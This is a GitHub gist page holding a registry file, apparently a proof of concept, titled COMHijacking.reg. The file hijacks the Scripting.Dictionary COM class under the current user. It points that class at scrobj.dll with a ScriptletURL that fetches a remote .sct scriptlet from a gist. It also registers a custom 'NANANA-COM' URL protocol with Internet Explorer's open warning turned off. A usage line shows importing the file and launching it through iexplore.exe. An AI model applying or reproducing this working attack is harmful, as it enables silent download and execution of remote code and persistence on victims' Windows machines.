Skip to content

Instantly share code, notes, and snippets.

@homjxi0e

homjxi0e/COMHijacking.reg Secret

Created September 30, 2018 23:40
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 4 You must be signed in to fork a gist
  • Save homjxi0e/2e47ffa59e314df04324937a13f8f320 to your computer and use it in GitHub Desktop.
Save homjxi0e/2e47ffa59e314df04324937a13f8f320 to your computer and use it in GitHub Desktop.
Download ZIP
reg import C:\Users\Matt\Desktop\COMHijacking.reg ==> .\iexplore.exe NANANA-COM:
Raw
COMHijacking.reg
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ProtocolExecute\NANANA-COM]
"WarnOnOpen"=dword:00000000
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
@=""
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
@="{00000001-0000-0000-0000-0000FEEDACDC}"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
@="C:\\WINDOWS\\system32\\scrobj.dll"
"ThreadingModel"="Apartment"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
@="Scripting.Dictionary"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
@="https://gist.githubusercontent.com/homjxi0e/1d83ba70f3bbf27daf2e6a390a099bcf/raw/d9b5cbfb16111684416e18782c8a564943d703db/lol2.sct
"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
@="Scripting.Dictionary"
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM]
@="URL:scripting.dictionary"
"URL Protocol"="scripting.dictionary"
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM\Application]
"ApplicationCompany"="@{windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy?ms-resource://windows.immersivecontrolpanel/Resources/PublisherDisplayName}"
"ApplicationDescription"="@{windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy?ms-resource://windows.immersivecontrolpanel/Resources/TileDescription}"
"ApplicationIcon"="@{windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy?ms-resource://windows.immersivecontrolpanel/Files/images/logo.png}"
"ApplicationName"="@{windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy?ms-resource://windows.immersivecontrolpanel/Resources/TileDisplayName}"
"AppUserModelId"="windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel"
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM\DefaultIcon]
@="@{windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy?ms-resource://windows.immersivecontrolpanel/Files/images/logo.png}"
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM\Shell]
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM\Shell\Open]
"ActivatableClassId"="microsoft.windows.immersivecontrolpanel"
"ContractId"="Windows.Protocol"
"DesiredInitialViewState"=dword:00000000
"PackageId"="windows.immersivecontrolpanel_10.0.2.1000_neutral_neutral_cw5n1h2txyewy"
[HKEY_CURRENT_USER\Software\Classes\NANANA-COM\Shell\Open\Command]
"DelegateExecute"="scripting.dictionary"
@=" "
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment